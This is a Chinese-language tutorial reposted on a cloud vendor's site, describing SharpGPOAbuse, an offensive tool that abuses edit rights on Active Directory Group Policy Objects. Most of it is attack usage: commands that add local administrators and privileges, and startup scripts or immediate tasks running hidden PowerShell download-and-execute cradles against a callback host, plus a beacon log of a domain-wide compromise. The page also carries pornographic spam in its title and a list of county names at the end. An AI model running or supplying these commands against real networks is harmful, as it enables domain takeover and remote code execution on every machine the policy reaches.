亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么通過用戶的編輯權限控制組策略對象控制對象

發布時間:2021-10-15 09:09:53 來源:億速云 閱讀:152 作者:iii 欄目:編程語言

本篇內容主要講解“怎么通過用戶的編輯權限控制組策略對象控制對象”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“怎么通過用戶的編輯權限控制組策略對象控制對象”吧!

關于SharpGPOAbuse

SharpGPOAbuse是一個功能強大的.NET應用程序,SharpGPOAbuse基于C#開發,可以幫助廣大研究人員利用目標系統中用戶針對一個組策略對象(GPO)的編輯權限來入侵并控制由該組策略對象(GPO)控制的對象。

項目獲取

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/FSecureLABS/SharpGPOAbuse.git

代碼編譯

請確保本地主機中必要的NuGet包已正常安裝,然后就可以使用Visual Studio將項目導入之后直接編譯構建了。

工具使用

Usage:

        SharpGPOAbuse.exe <攻擊類型> <攻擊選項>

攻擊類型

當前版本的SharpGPOAbuse支持下列攻擊類型:

選項

描述

--AddUserRights

向用戶添加權限

--AddLocalAdmin

向本地管理員組中添加一個用戶

--AddComputerScript

添加一個新的計算機啟動腳本

--AddUserScript

配置一個用戶登錄腳本

--AddComputerTask

配置一個計算機立即執行的任務

--AddUserTask

向用戶添加一個立即執行的任務

攻擊選項

添加用戶權限

Options required to add new user rights:

--UserRights

        給用戶添加新的權限,該參數大小寫敏感,可以使用逗號分隔的列表。

--UserAccount

        設置需要添加新權限的用戶賬號。

--GPOName

        存在安全漏洞的GPO名稱。

        

樣例:

        SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

添加一個本地管理員

Options required to add a new local admin:

--UserAccount

        設置需要添加進本地管理員組中的賬號名稱。

--GPOName

        存在安全漏洞的GPO名稱。

 

樣例:

        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

配置一個用戶或計算機登錄腳本

Options required to add a new user or computer startup script:

--ScriptName

        設置新啟動腳本的名稱。

--ScriptContents

        設置新啟動腳本的內容。

--GPOName

        存在安全漏洞的GPO名稱。

 

樣例:

        SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

如果你只想要對GPO控制的特定用戶或計算機執行惡意腳本,你可以在惡意腳本中添加一個if語句:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

配置計算機或用戶立即執行的任務

Options required to add a new computer or user immediate task:

 

--TaskName

        設置新計算機任務的名稱。Set the name of the new computer task.

--Author

        設置新任務的開發者(可以使用DA賬號)。

--Command

        需要執行的命令

--Arguments

        傳遞給命令的參數。

--GPOName

        存在安全漏洞的GPO名稱。

 

Additional User Task Options:

--FilterEnabled

        啟用任務過濾器。Enable Target Filtering for user immediate tasks.

--TargetUsername

        目標用戶,惡意任務只會針對特定用戶運行,格式為 <DOMAIN>\<USERNAME>。

--TargetUserSID

        目標用戶的SID。

 

Additional Computer Task Options:

--FilterEnabled

        啟用任務過濾器。

--TargetDnsName

        目標DNS名稱,惡意任務只會針對目標主機運行。

        

樣例:

        SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

如果你只想要對GPO控制的特定用戶或計算機運行惡意任務,你可以參照下列命令:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com

額外選項

選項

描述

--DomainController

設置目標域控制器

--Domain

設置目標域名

--Force

改寫現有文件

工具輸出樣例

beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"

[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I

EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"

[+] host called home, sent: 171553 bytes

[+] received output:

[+] Domain = europa.com

[+] Domain Controller = EURODC01.europa.com

[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com

[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}

[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml

[+] versionNumber attribute changed successfully

[+] The version number in GPT.ini was increased successfully.

[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.

[+] Done!

到此,相信大家對“怎么通過用戶的編輯權限控制組策略對象控制對象”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

昭苏县| 大宁县| 靖远县| 三台县| 忻城县| 南木林县| 松潘县| 永仁县| 新宾| 东山县| 藁城市| 新兴县| 昔阳县| 万载县| 麻栗坡县| 绍兴市| 远安县| 措勤县| 廊坊市| 绥化市| 咸宁市| 大邑县| 梁河县| 赤水市| 中江县| 保靖县| 嘉鱼县| 华容县| 佳木斯市| 绍兴市| 闸北区| 邳州市| 安义县| 富裕县| 景泰县| 墨脱县| 泰兴市| 榕江县| 海林市| 昭觉县| 忻州市|